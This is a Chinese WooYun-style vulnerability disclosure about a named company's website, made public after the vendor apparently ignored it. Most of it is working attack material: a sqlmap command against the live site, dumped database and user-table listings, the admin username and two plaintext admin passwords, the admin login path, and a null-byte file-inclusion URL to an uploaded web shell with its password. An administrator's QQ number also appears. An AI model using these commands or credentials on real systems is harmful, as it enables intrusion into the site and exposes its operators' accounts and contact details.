乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-02: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-12-17: 厂商已经主动忽略漏洞,细节向公众公开
迪讯信息技术公司SQL注入/文件包含/getshell
sqlmap.py -u "http://www.dcominfo.com/product/index.php?type_id=9" --dbs
available databases [2]:[*] dcominfo[*] information_schemaDatabase: dcominfo[10 tables]+---------------------------+| ruideman_cn_archives || ruideman_cn_news || ruideman_cn_news_type || ruideman_cn_partners || ruideman_cn_partners_type || ruideman_cn_pictures || ruideman_cn_product || ruideman_cn_product_type || ruideman_cn_user || ruideman_cn_xuhao |+---------------------------+Database: dcominfoTable: ruideman_cn_user[37 columns]+-------------------+------------------+| Column | Type |+-------------------+------------------+| answer | varchar(40) || area | varchar(6) || birthday | date || city | varchar(6) || clicktimes | int(10) unsigned || company_type | tinyint(3) || education_type | tinyint(3) || email | varchar(40) || good_evaluate | float || integrity_grade | tinyint(3) || is_check | tinyint(1) || lastlog | datetime || marriage_type | tinyint(3) || nick_name | varchar(50) || pass | tinyint(4) || password | varchar(32) || province | varchar(6) || question | varchar(40) || real_name | varchar(30) || recommend_user_id | int(10) || recommendflag | tinyint(1) || session_id | char(32) || sex | tinyint(3) || structon_tb | text || submit_date | datetime || thumbnail | varchar(100) || topflag | tinyint(1) || total_credit | int(10) || user_grade | tinyint(1) || user_group | smallint(1) || user_id | int(10) unsigned || user_ip | varchar(23) || user_money | float || user_name | varchar(30) || user_popedom | varchar(200) || user_type | tinyint(1) || vocation_type | tinyint(3) |+-------------------+------------------+Database: dcominfoTable: ruideman_cn_user[1 entry]+-----------+| user_name |+-----------+| admin |+-----------+Database: dcominfoTable: ruideman_cn_user[1 entry]+----------+| password |+----------+| ab0528 |+----------+
后台
http://www.dcominfo.com/admin/login.php
刚那管理员又去改密码了。。。乌云。。。可是密码还是明文的。。。新密码:DcomXGA0528
撸进后台然后进行上传shellhttp://www.dcominfo.com/wap/detail.php?mod=/uploadfile/product/s/1/46_1446271963.jpg%00密码1
已经getshell
综上
已经和管理员沟通过,他们会来认领的,求过,管理员QQ:2250832217
未能联系到厂商或者厂商积极拒绝